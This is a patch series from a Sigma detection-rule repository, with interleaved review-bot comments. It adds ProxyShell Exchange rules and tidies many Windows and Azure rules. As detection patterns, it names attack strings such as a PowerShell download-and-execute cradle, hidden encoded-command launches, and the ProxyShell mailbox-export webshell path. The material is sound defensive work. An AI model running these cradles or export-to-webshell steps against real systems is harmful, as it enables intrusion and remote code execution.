@@ -0,0 +1,31 @@ +title: Successful Exchange ProxyShell Attack +id: 992be1eb-e5da-437e-9a54-6d13b57bb4d8 +status: experimental +description: Detects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers +references: + - https://youtu.be/5mqid-7zp8k?t=2231 + - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html + - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 +author: Florian Roth, Rich Warren +date: 2021/08/09 +tags: + - attack.initial_access +logsource: + category: webserver +detection: + selection_auto: + c-uri|contains: '/autodiscover.json' + selection_uri: + c-uri|contains: + - '/powershell' + - '/mapi/nspi' + - '/EWS' + - 'X-Rps-CAT' + selection_success: + sc-status: + - 200 + - 301 + condition: selection_auto and selection_uri and selection_success +falsepositives: + - Unknown +level: critical \ No newline at end of file diff --git a/rules/windows/process_creation/win_exchange_proxyshell_mailboxexport.yml b/rules/windows/process_creation/win_exchange_proxyshell_mailboxexport.yml new file mode 100644 index 00000000..7c5970f5 --- /dev/null +++ b/rules/windows/process_creation/win_exchange_proxyshell_mailboxexport.yml 
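Review bot: `sc-status: 301` is treated as proof of a successful exploitation alongside `200`, but a redirect from the autodiscover endpoint may also be returned for requests the server did not process as intended, which would turn a `critical` alert into noise; unless the referenced write-ups show a 301 on the working exploit path, restrict `selection_success` to `sc-status: 200` or add a comment explaining why 301 qualifies. The description repeats the `URP patterns` typo (`URI patterns`). `X-Rps-CAT` in `selection_uri` is a query-parameter name rather than a path segment, so the match only works where the log keeps the query string — worth noting inline, e.g. `- 'X-Rps-CAT'  # query parameter; requires full URI (incl. query string) logging`.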
@@ -0,0 +1,30 @@ +title: ProxyShell MSExchange MailBox Export Pattern +id: 516376b4-05cd-4122-bae0-ad7641c38d48 +status: experimental +description: Detects specific patterns found after a successful ProxyShell exploitation in relation to a Commandlet invokation of New-MailboxExportRequest +references: + - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html?m=1 +author: Florian Roth, Rich Warren +date: 2021/08/09 +logsource: + product: windows + service: msexchange-management +detection: + selection_cmdlet: + Message|contains|all: + - 'New-MailboxExport-Request' + - ' -Mailbox ' + selection_params: + Message|contains: + - '-FilePath "\\localhost\C$' + - '-FilePath "\\127.0.0.1\C$' + - '.aspx' + selection_assignment: + Message|contains|all: + - 'New-ManagementRoleAssignment' + - ' -Role "Mailbox Import Export"' + - ' -User "exchange.admin"' + condition: selection_cmdlet and selection_params or selection_assignment +falsepositives: + - Unlikely +level: critical \ No newline at end of file From dbf8aecd83dfac73131468fb7059f8703c5a4412 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 9 Aug 2021 18:05:51 +0200 Subject: [PATCH 0267/1367] fix: typo in cmdlet name --- .../process_creation/win_exchange_proxyshell_mailboxexport.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_exchange_proxyshell_mailboxexport.yml b/rules/windows/process_creation/win_exchange_proxyshell_mailboxexport.yml index 7c5970f5..335ad125 100644 --- a/rules/windows/process_creation/win_exchange_proxyshell_mailboxexport.yml +++ b/rules/windows/process_creation/win_exchange_proxyshell_mailboxexport.yml @@ -12,7 +12,7 @@ logsource: detection: selection_cmdlet: Message|contains|all: - - 'New-MailboxExport-Request' + - 'New-MailboxExportRequest' - ' -Mailbox ' selection_params: Message|contains: From 78e0e570dd47effeab9a1cfa2c76af409b2c1a91 Mon Sep 17 00:00:00 2001 
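Review bot: The rule is placed under `rules/windows/process_creation/` but its logsource is `service: msexchange-management` with `Message|contains` selectors, so it is an Exchange management-log rule, not a process-creation one; move it next to the other Windows service rules so the right field mappings apply. The UNC prefixes `-FilePath "\\localhost\C$` and `-FilePath "\\127.0.0.1\C$` should be checked against Sigma's value escaping, where a double backslash not followed by a wildcard denotes a single literal backslash — if sigmac emits `\localhost\C$`, write `\\\\localhost\C$` instead. `selection_assignment` hard-codes ` -User "exchange.admin"` from the PoC; an attacker chooses any user, so matching `New-ManagementRoleAssignment` with ` -Role "Mailbox Import Export"` alone (keeping the PoC user name in a comment) is more robust. `invokation` in the description should be `invocation`.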
From: frack113 Date: Mon, 9 Aug 2021 20:23:35 +0200 Subject: [PATCH 0268/1367] Split PR 1802 builtin net rules --- rules/windows/builtin/win_account_discovery.yml | 5 ++--- rules/windows/builtin/win_ad_user_enumeration.yml | 7 ++++--- .../builtin/win_alert_active_directory_user_control.yml | 8 +++----- .../windows/builtin/win_alert_enable_weak_encryption.yml | 4 ++-- rules/windows/builtin/win_alert_ruler.yml | 5 ++--- .../win_arbitrary_shell_execution_via_settingcontent.yml | 5 ++--- .../windows/builtin/win_cobaltstrike_service_installs.yml | 8 +++----- rules/windows/builtin/win_dcsync.yml | 5 ++--- rules/windows/builtin/win_external_device.yml | 5 ++--- .../builtin/win_hybridconnectionmgr_svc_installation.yml | 4 ++-- .../builtin/win_invoke_obfuscation_stdin+_services.yml | 4 ++-- .../builtin/win_invoke_obfuscation_var+_services.yml | 4 ++-- .../win_invoke_obfuscation_via_compress_services.yml | 4 ++-- .../win_invoke_obfuscation_via_rundll_services.yml | 4 ++-- .../builtin/win_invoke_obfuscation_via_stdin_services.yml | 4 ++-- .../win_invoke_obfuscation_via_use_clip_services.yml | 4 ++-- .../win_invoke_obfuscation_via_use_mshta_services.yml | 4 ++-- .../win_invoke_obfuscation_via_use_rundll32_services.yml | 4 ++-- .../builtin/win_invoke_obfuscation_via_var++_services.yml | 3 ++- .../win_susp_failed_logons_explicit_credentials.yml | 3 ++- rules/windows/builtin/win_susp_raccess_sensitive_fext.yml | 5 ++--- rules/windows/builtin/win_vul_cve_2020_0688.yml | 5 ++--- rules/windows/builtin/win_vul_cve_2020_1472.yml | 4 ++-- 23 files changed, 50 insertions(+), 58 deletions(-) diff --git a/rules/windows/builtin/win_account_discovery.yml b/rules/windows/builtin/win_account_discovery.yml index a6705cb8..017048ad 100644 --- a/rules/windows/builtin/win_account_discovery.yml +++ b/rules/windows/builtin/win_account_discovery.yml 
@@ -10,7 +10,7 @@ tags: status: experimental author: Samir Bousseaden date: 2019/04/03 -modified: 2020/08/23 +modified: 2021/09/08 logsource: product: windows service: security @@ -32,8 +32,7 @@ detection: - '-544' - '-551' - '-555' - - ObjectName|contains: - - 'admin' + - ObjectName|contains: 'admin' condition: selection and selection_object falsepositives: - if source account name is not an admin then its super suspicious diff --git a/rules/windows/builtin/win_ad_user_enumeration.yml b/rules/windows/builtin/win_ad_user_enumeration.yml index 58639e2b..85a1ac96 100644 --- a/rules/windows/builtin/win_ad_user_enumeration.yml +++ b/rules/windows/builtin/win_ad_user_enumeration.yml @@ -3,7 +3,7 @@ id: ab6bffca-beff-4baa-af11-6733f296d57a description: Detects access to a domain user from a non-machine account status: experimental date: 2020/03/30 -modified: 2020/08/23 +modified: 2021/08/09 author: Maxime Thiebaut (@0xThiebaut) references: - https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf @@ -20,8 +20,9 @@ logsource: detection: selection: EventID: 4662 - ObjectType|contains: # Using contains as the data commonly is structured as "%{bf967aba-0de6-11d0-a285-00aa003049e2}" - - 'bf967aba-0de6-11d0-a285-00aa003049e2' # The user class (https://docs.microsoft.com/en-us/windows/win32/adschema/c-user) + ObjectType|contains: 'bf967aba-0de6-11d0-a285-00aa003049e2' + # Using contains as the data commonly is structured as "%{bf967aba-0de6-11d0-a285-00aa003049e2}" + # The user class (https://docs.microsoft.com/en-us/windows/win32/adschema/c-user) filter: - SubjectUserName|endswith: '$' # Exclude machine accounts - SubjectUserName|startswith: 'MSOL_' # https://docs.microsoft.com/en-us/azure/active-directory/hybrid/reference-connect-accounts-permissions#ad-ds-connector-account diff --git a/rules/windows/builtin/win_alert_active_directory_user_control.yml b/rules/windows/builtin/win_alert_active_directory_user_control.yml index 078f02eb..8825ab11 100644 
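Review bot: `modified: 2021/09/08` in the first `win_account_discovery.yml` hunk is a month/day transposition: the commit is dated 2021/08/09 and every other file in this series receives `modified: 2021/08/09`, so this stamp is a month in the future; change it to `modified: 2021/08/09`. The second hunk only collapses a single-item list into a scalar and needs no further change.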
--- a/rules/windows/builtin/win_alert_active_directory_user_control.yml +++ b/rules/windows/builtin/win_alert_active_directory_user_control.yml @@ -8,7 +8,7 @@ references: - https://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/ author: '@neu5ron' date: 2017/07/30 -modified: 2020/08/23 +modified: 2021/08/09 logsource: product: windows service: security @@ -16,10 +16,8 @@ logsource: detection: selection: EventID: 4704 - keywords: - Message|contains: - - 'SeEnableDelegationPrivilege' - condition: all of them + Message|contains: 'SeEnableDelegationPrivilege' + condition: selection falsepositives: - Unknown level: high diff --git a/rules/windows/builtin/win_alert_enable_weak_encryption.yml b/rules/windows/builtin/win_alert_enable_weak_encryption.yml index c0904ce5..abc236e0 100644 --- a/rules/windows/builtin/win_alert_enable_weak_encryption.yml +++ b/rules/windows/builtin/win_alert_enable_weak_encryption.yml @@ -6,6 +6,7 @@ references: - https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/ author: '@neu5ron' date: 2017/07/30 +modified: 2021/08/09 tags: - attack.defense_evasion - attack.t1089 # an old one @@ -23,8 +24,7 @@ detection: - 'Preauth' - 'Encrypted' filters: - Message|contains: - - 'Enabled' + Message|contains: 'Enabled' condition: selection and keywords and filters falsepositives: - Unknown diff --git a/rules/windows/builtin/win_alert_ruler.yml b/rules/windows/builtin/win_alert_ruler.yml index ddd9ebab..4702434c 100644 --- a/rules/windows/builtin/win_alert_ruler.yml +++ b/rules/windows/builtin/win_alert_ruler.yml @@ -3,7 +3,7 @@ id: 24549159-ac1b-479c-8175-d42aea947cae description: This events that are generated when using the hacktool Ruler by Sensepost author: Florian Roth date: 2017/05/31 -modified: 2019/07/26 +modified: 2021/08/09 references: - https://github.com/sensepost/ruler - https://github.com/sensepost/ruler/issues/47 
@@ -23,8 +23,7 @@ logsource: service: security detection: selection1: - EventID: - - 4776 + EventID: 4776 Workstation: 'RULER' selection2: EventID: diff --git a/rules/windows/builtin/win_arbitrary_shell_execution_via_settingcontent.yml b/rules/windows/builtin/win_arbitrary_shell_execution_via_settingcontent.yml index 49d00cae..659c0e75 100644 --- a/rules/windows/builtin/win_arbitrary_shell_execution_via_settingcontent.yml +++ b/rules/windows/builtin/win_arbitrary_shell_execution_via_settingcontent.yml @@ -3,7 +3,7 @@ id: 24de4f3b-804c-4165-b442-5a06a2302c7e description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries. author: Sreeman date: 2020/13/03 -modified: 2021/06/11 +modified: 2021/08/09 references: - https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39 tags: @@ -18,8 +18,7 @@ detection: selection: CommandLine|contains: '.SettingContent-ms' filter: - FilePath|contains: - - 'immersivecontrolpanel' + FilePath|contains: 'immersivecontrolpanel' condition: selection and not filter falsepositives: - unknown diff --git a/rules/windows/builtin/win_cobaltstrike_service_installs.yml b/rules/windows/builtin/win_cobaltstrike_service_installs.yml index 5285feef..a52c5ed2 100644 --- a/rules/windows/builtin/win_cobaltstrike_service_installs.yml +++ b/rules/windows/builtin/win_cobaltstrike_service_installs.yml @@ -6,7 +6,7 @@ references: - https://www.sans.org/webcasts/119395 - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/ date: 2021/05/26 -modified: 2021/07/31 +modified: 2021/08/09 tags: - attack.execution - attack.privilege_escalation 
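Review bot: In `win_arbitrary_shell_execution_via_settingcontent.yml` the context line `date: 2020/13/03` directly above the bumped `modified:` is not a valid date (month 13), presumably a day/month transposition of `2020/03/13`; since the file is being touched anyway, fix it to `date: 2020/03/13` so a `YYYY/MM/DD` validation pass does not reject the rule. The remaining hunks on this line are scalar collapses and `modified` bumps that need no change.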
@@ -30,11 +30,9 @@ detection: - 'start' - 'powershell' selection3: - ServiceFileName|contains: - - 'powershell -nop -w hidden -encodedcommand' + ServiceFileName|contains: 'powershell -nop -w hidden -encodedcommand' selection4: - ServiceFileName|base64offset|contains: - - "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:" + ServiceFileName|base64offset|contains: "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:" condition: selection_id and (selection1 or selection2 or selection3 or selection4) falsepositives: - Unknown diff --git a/rules/windows/builtin/win_dcsync.yml b/rules/windows/builtin/win_dcsync.yml index d4406838..d5645706 100644 --- a/rules/windows/builtin/win_dcsync.yml +++ b/rules/windows/builtin/win_dcsync.yml @@ -3,7 +3,7 @@ id: 611eab06-a145-4dfa-a295-3ccc5c20f59a description: Detects Mimikatz DC sync security events status: experimental date: 2018/06/03 -modified: 2020/09/11 +modified: 2021/08/09 author: Benjamin Delpy, Florian Roth, Scott Dermott references: - https://twitter.com/gentilkiwi/status/1003236624925413376 @@ -29,8 +29,7 @@ detection: - 'NT AUTHORITY' - 'MSOL_' filter3: - SubjectUserName|endswith: - - '$' + SubjectUserName|endswith: '$' condition: selection and not filter1 and not filter2 and not filter3 falsepositives: - Valid DC Sync that is not covered by the filters; please report diff --git a/rules/windows/builtin/win_external_device.yml b/rules/windows/builtin/win_external_device.yml index 927efa23..9a64bb7a 100644 --- a/rules/windows/builtin/win_external_device.yml +++ b/rules/windows/builtin/win_external_device.yml @@ -4,7 +4,7 @@ description: Detects external diskdrives or plugged in USB devices , EventID 641 status: experimental author: Keith Wright date: 2019/11/20 -modified: 2021/07/06 +modified: 2021/08/09 tags: - attack.t1091 - attack.t1200 
@@ -15,8 +15,7 @@ logsource: service: security detection: selection: - EventID: - - 6416 + EventID: 6416 ClassName: 'DiskDrive' selection2: DeviceDescription: 'USB Mass Storage Device' diff --git a/rules/windows/builtin/win_hybridconnectionmgr_svc_installation.yml b/rules/windows/builtin/win_hybridconnectionmgr_svc_installation.yml index 8731d1f9..151ec7dd 100644 --- a/rules/windows/builtin/win_hybridconnectionmgr_svc_installation.yml +++ b/rules/windows/builtin/win_hybridconnectionmgr_svc_installation.yml @@ -3,6 +3,7 @@ id: 0ee4d8a5-4e67-4faf-acfa-62a78457d1f2 description: Rule to detect the Hybrid Connection Manager service installation. status: experimental date: 2021/04/12 +modified: 2021/08/09 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.persistence @@ -13,8 +14,7 @@ logsource: service: security detection: selection: - EventID: - - 4697 + EventID: 4697 ServiceName: HybridConnectionManager ServiceFileName|contains: HybridConnectionManager condition: selection diff --git a/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml b/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml index 3e8313bf..1345ea6c 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml @@ -5,7 +5,7 @@ description: Detects Obfuscated use of stdin to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/15 -modified: 2021/05/27 +modified: 2021/08/09 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 25) tags: @@ -18,7 +18,7 @@ falsepositives: level: high detection: selection: - - ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' + ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' condition: selection and selection_eventid --- logsource: 
diff --git a/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml b/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml index 317760bd..366fea97 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml @@ -5,7 +5,7 @@ description: Detects Obfuscated use of Environment Variables to execute PowerShe status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/15 -modified: 2021/06/10 +modified: 2021/08/09 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 24) tags: @@ -18,7 +18,7 @@ falsepositives: level: high detection: selection: - - ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' + ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' condition: all of them --- logsource: diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_compress_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_compress_services.yml index 9664661b..2ec58024 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_compress_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_compress_services.yml @@ -5,7 +5,7 @@ description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/18 -modified: 2021/05/27 +modified: 2021/08/09 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 19) tags: @@ -18,7 +18,7 @@ falsepositives: level: medium detection: selection: - - ImagePath|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' + ImagePath|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' condition: selection and selection_eventid --- logsource: 
diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services.yml index fcf7920e..e6925517 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services.yml @@ -5,7 +5,7 @@ description: Detects Obfuscated Powershell via RUNDLL LAUNCHER status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/18 -modified: 2021/05/27 +modified: 2021/08/09 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 23) tags: @@ -18,7 +18,7 @@ falsepositives: level: medium detection: selection: - - ImagePath|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' + ImagePath|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' condition: selection and selection_eventid --- logsource: diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services.yml index df37801a..01baa20f 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services.yml @@ -5,7 +5,7 @@ description: Detects Obfuscated Powershell via Stdin in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/12 -modified: 2021/05/27 +modified: 2021/08/09 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task28) tags: @@ -18,7 +18,7 @@ falsepositives: level: high detection: selection: - - ImagePath|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' + ImagePath|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' condition: selection and selection_eventid --- logsource: 
diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services.yml index 2bb42aec..701415bd 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services.yml @@ -5,7 +5,7 @@ description: Detects Obfuscated Powershell via use Clip.exe in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/09 -modified: 2021/05/27 +modified: 2021/08/09 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task29) tags: @@ -18,7 +18,7 @@ falsepositives: level: high detection: selection: - - ImagePath|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' + ImagePath|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' condition: selection and selection_eventid --- logsource: diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services.yml index 9ba4f896..ccdb7759 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services.yml @@ -5,7 +5,7 @@ description: Detects Obfuscated Powershell via use MSHTA in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/09 -modified: 2021/05/27 +modified: 2021/08/09 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task31) tags: @@ -18,7 +18,7 @@ falsepositives: level: high detection: selection: - - ImagePath|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' + ImagePath|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' condition: selection and selection_eventid --- logsource: 
diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services.yml index 84bf36fd..4c2297a6 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services.yml @@ -5,7 +5,7 @@ description: Detects Obfuscated Powershell via use Rundll32 in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/09 -modified: 2021/05/27 +modified: 2021/08/09 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task30) tags: @@ -18,7 +18,7 @@ falsepositives: level: high detection: selection: - - ImagePath|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' + ImagePath|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' condition: selection and selection_eventid --- logsource: diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml index aaa51e80..e042bb14 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml @@ -5,6 +5,7 @@ description: Detects Obfuscated Powershell via VAR++ LAUNCHER status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/13 +modified: 2021/08/09 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task27) tags: @@ -17,7 +18,7 @@ falsepositives: level: high detection: selection: - - ImagePath|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r + ImagePath|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r condition: selection and selection_eventid --- logsource: 
diff --git a/rules/windows/builtin/win_susp_failed_logons_explicit_credentials.yml b/rules/windows/builtin/win_susp_failed_logons_explicit_credentials.yml index a64133d2..95efe7d8 100644 --- a/rules/windows/builtin/win_susp_failed_logons_explicit_credentials.yml +++ b/rules/windows/builtin/win_susp_failed_logons_explicit_credentials.yml @@ -3,6 +3,7 @@ id: 196a29c2-e378-48d8-ba07-8a9e61f7fab9 description: Detects a source user failing to authenticate with multiple users using explicit credentials on a host. author: Mauricio Velazco date: 2021/06/01 +modified: 2021/08/09 references: - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying tags: @@ -14,7 +15,7 @@ logsource: service: security detection: selection1: - EventID: '4648' + EventID: 4648 timeframe: 24h condition: - selection1 | count(Account_Name) by ComputerName > 10 diff --git a/rules/windows/builtin/win_susp_raccess_sensitive_fext.yml b/rules/windows/builtin/win_susp_raccess_sensitive_fext.yml index 66caa1f7..cb04f62a 100644 --- a/rules/windows/builtin/win_susp_raccess_sensitive_fext.yml +++ b/rules/windows/builtin/win_susp_raccess_sensitive_fext.yml @@ -3,7 +3,7 @@ id: 91c945bc-2ad1-4799-a591-4d00198a1215 description: Detects known sensitive file extensions accessed on a network share author: Samir Bousseaden date: 2019/04/03 -modified: 2020/08/23 +modified: 2021/08/09 tags: - attack.collection - attack.t1039 @@ -12,8 +12,7 @@ logsource: service: security detection: selection: - EventID: - - 5145 + EventID: 5145 RelativeTargetName|endswith: - '.pst' - '.ost' diff --git a/rules/windows/builtin/win_vul_cve_2020_0688.yml b/rules/windows/builtin/win_vul_cve_2020_0688.yml index 51a0902c..b34e251e 100644 --- a/rules/windows/builtin/win_vul_cve_2020_0688.yml +++ b/rules/windows/builtin/win_vul_cve_2020_0688.yml 
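Review bot: The aggregation `count(Account_Name) by ComputerName > 10` uses `Account_Name`, the raw event-text label, whereas the other Security-log hunks in this series use the Windows field names (`SubjectUserName`, `TargetUserName`) that the backend mappings expect; for 4648 the account being authenticated with explicit credentials is presumably `TargetUserName`, so `count(TargetUserName) by ComputerName > 10` is more likely to convert correctly — confirm against the field-mapping config. Changing `EventID: '4648'` to the numeric `EventID: 4648` is consistent with the rest of the repo.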
@@ -7,7 +7,7 @@ references: - https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/ author: Florian Roth, wagga date: 2020/02/29 -modified: 2021/06/27 +modified: 2021/08/09 tags: - attack.initial_access - attack.t1190 @@ -20,8 +20,7 @@ detection: Source: MSExchange Control Panel Level: Error selection2: - Message|contains: - - '&__VIEWSTATE=' + Message|contains: '&__VIEWSTATE=' condition: selection1 and selection2 falsepositives: - Unknown diff --git a/rules/windows/builtin/win_vul_cve_2020_1472.yml b/rules/windows/builtin/win_vul_cve_2020_1472.yml index 992ca7a2..7210bd7e 100644 --- a/rules/windows/builtin/win_vul_cve_2020_1472.yml +++ b/rules/windows/builtin/win_vul_cve_2020_1472.yml @@ -6,6 +6,7 @@ references: - https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc author: NVISO date: 2020/09/15 +modified: 2021/08/09 tags: - attack.privilege_escalation logsource: @@ -13,8 +14,7 @@ logsource: service: system detection: selection: - EventID: - - 5829 + EventID: 5829 condition: selection fields: - SAMAccountName From c3efcbe2925d62190c424aedb9f2b8b6bcd92ac5 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 14:30:57 -0500 Subject: [PATCH 0269/1367] Update azure_network_virtual_device_modified_or_deleted.yml --- .../cloud/azure_network_virtual_device_modified_or_deleted.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/rules/cloud/azure_network_virtual_device_modified_or_deleted.yml b/rules/cloud/azure_network_virtual_device_modified_or_deleted.yml index 5a5ec909..4034c0ce 100644 --- a/rules/cloud/azure_network_virtual_device_modified_or_deleted.yml +++ b/rules/cloud/azure_network_virtual_device_modified_or_deleted.yml 
@@ -11,6 +11,8 @@ logsource: detection: selection: properties.message: + - MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/WRITE + - MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/DELETE - MICROSOFT.NETWORK/NETWORKINTERFACES/WRITE - MICROSOFT.NETWORK/NETWORKINTERFACES/JOIN/ACTION - MICROSOFT.NETWORK/NETWORKINTERFACES/DELETE From 70e2bb06a29e7ec6b3ebe8ae625bc18016e638cc Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 14:35:27 -0500 Subject: [PATCH 0270/1367] Update azure_vpn_connection_modified_or_deleted.yml --- rules/cloud/azure_vpn_connection_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_vpn_connection_modified_or_deleted.yml b/rules/cloud/azure_vpn_connection_modified_or_deleted.yml index 57880f26..50dc3a56 100644 --- a/rules/cloud/azure_vpn_connection_modified_or_deleted.yml +++ b/rules/cloud/azure_vpn_connection_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure VPN Connection Modified or Deleted id: 61171ffc-d79c-4ae5-8e10-9323dba19cd3 description: Identifies when a VPN connection is modified or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/08 references: From 27ce5575626c41a69cd6177ced28cd4cadaa2b4b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 14:35:45 -0500 Subject: [PATCH 0271/1367] Update azure_virtual_network_modified_or_deleted.yml --- rules/cloud/azure_virtual_network_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_virtual_network_modified_or_deleted.yml b/rules/cloud/azure_virtual_network_modified_or_deleted.yml index fd261ea6..68f2c755 100644 --- a/rules/cloud/azure_virtual_network_modified_or_deleted.yml +++ b/rules/cloud/azure_virtual_network_modified_or_deleted.yml 
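Review bot: A write to `MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS` is a different signal from the NIC changes it is grouped with — a TAP configuration mirrors the interface's traffic to a collector, which is a collection/sniffing primitive rather than a device modification, and folding it into this medium-level rule hides that from the analyst. Consider a dedicated rule, or at least a sentence in the description and an `attack.collection` tag explaining why a TAP write matters; the title, level and tags of this rule are outside the hunk.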
